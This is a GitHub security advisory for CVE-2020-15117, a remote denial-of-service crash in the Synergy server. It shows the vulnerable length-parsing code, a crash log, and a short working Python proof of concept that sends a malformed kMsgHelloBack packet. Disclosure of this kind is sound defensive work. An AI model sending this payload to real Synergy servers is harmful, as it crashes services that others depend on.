Skip to content

Denial of Service / Crash of synergys

Moderate
Jnewbon published GHSA-chfm-333q-gfpp Jul 14, 2020

Package

synergys

Affected versions

<1.12.0

Patched versions

None

Description

Advisory

Zendesk Ticket: 132450
Vendor: Symless
Software: Synergy
Software URL: https://github.com/symless/synergy-core https://symless.com/synergy
Version Reviewed: 1.12.0, protocol version 1.6
Bug Type: Denial of Service / Crash
Vector: Remote, unauthenticated
Impact: Denial of Service
Discovery Date: 20200706
Discovered By: Sven Blumenstein of Apple Information Security
CVSS: 6.5
Summary:

A Synergy server can be crashed by sending a kMsgHelloBack packet with a client name length set to
0xffffffff (4294967295) if the servers memory is less than 4 GB.

Technical Details:

If a client sends a kMsgHelloBack packet, the size of the client name is sent as 4 bytes, that are parsed as follows:

UInt32 len = (static_cast<UInt32>(buffer[0]) << 24) |
(static_cast<UInt32>(buffer[1]) << 16) |
(static_cast<UInt32>(buffer[2]) << 8) |
static_cast<UInt32>(buffer[3]);

Next a buffer is allocated based on that value:

UInt8* sBuffer = buffer;
if (!useFixed) {
sBuffer = new UInt8[len];
}

This will fail if the requested buffer size is larger than the available system memory and get catched by the following code:

} catch (std::bad_alloc &ba) {
delete server;
throw ba;
}

Log file output of a crash based on this issue:

synergys -f -d DEBUG2 --config synergy.conf

[...]
[2020-07-06T15:14:45] NOTE: accepted client connection
[2020-07-06T15:14:45] DEBUG1: registered event type inputReady as 37
[2020-07-06T15:14:45] DEBUG1: registered event type outputError as 38
[2020-07-06T15:14:45] DEBUG1: registered event type inputShutdown as 39
[2020-07-06T15:14:45] DEBUG1: registered event type outputShutdown as 40
[2020-07-06T15:14:45] DEBUG1: saying hello
[2020-07-06T15:14:45] DEBUG2: writef(Synergy%2i%2i)
[2020-07-06T15:14:45] DEBUG1: registered event type outputFlushed as 41
[2020-07-06T15:14:45] DEBUG2: wrote 11 bytes
[2020-07-06T15:14:45] DEBUG1: registered event type success as 42
[2020-07-06T15:14:45] DEBUG1: registered event type failure as 43
[2020-07-06T15:14:45] DEBUG1: parsing hello reply
[2020-07-06T15:14:45] DEBUG2: readf(Synergy%2i%2i%s)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 1 (0x1)
[2020-07-06T15:14:45] DEBUG2: readf: read 2 byte integer: 6 (0x6)
[2020-07-06T15:14:45] DEBUG1: caught cancel on thread 0x00000002
[2020-07-06T15:14:45] FATAL: An error occurred: std::bad_alloc

Synergy config file and proof of concept:

synergy.conf:

section: screens
  synclient:
  syntest:
end
section: links
  synclient:
    right = syntest 
  syntest:
    left = synclient 
end

Proof of concept:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.13.37.207', 24800))
print s.recv(2048)
s.sendall('\x00\x00\x00\x10Synergy\x00\x01\x00\x06\xff\xff\xff\xffA')

It was verified that this issue does not cause a crash through the exception handler if the
available memory of the Server is more than 4GB.

Recommendations:

  • Limit the maximum value of a string parameter to a more resonable amount for the kMsgHellBack packet.
  • Check string allocation size against available memory and catch an exception without terminating the server.

Severity

Moderate

CVE ID

CVE-2020-15117

Weaknesses

No CWEs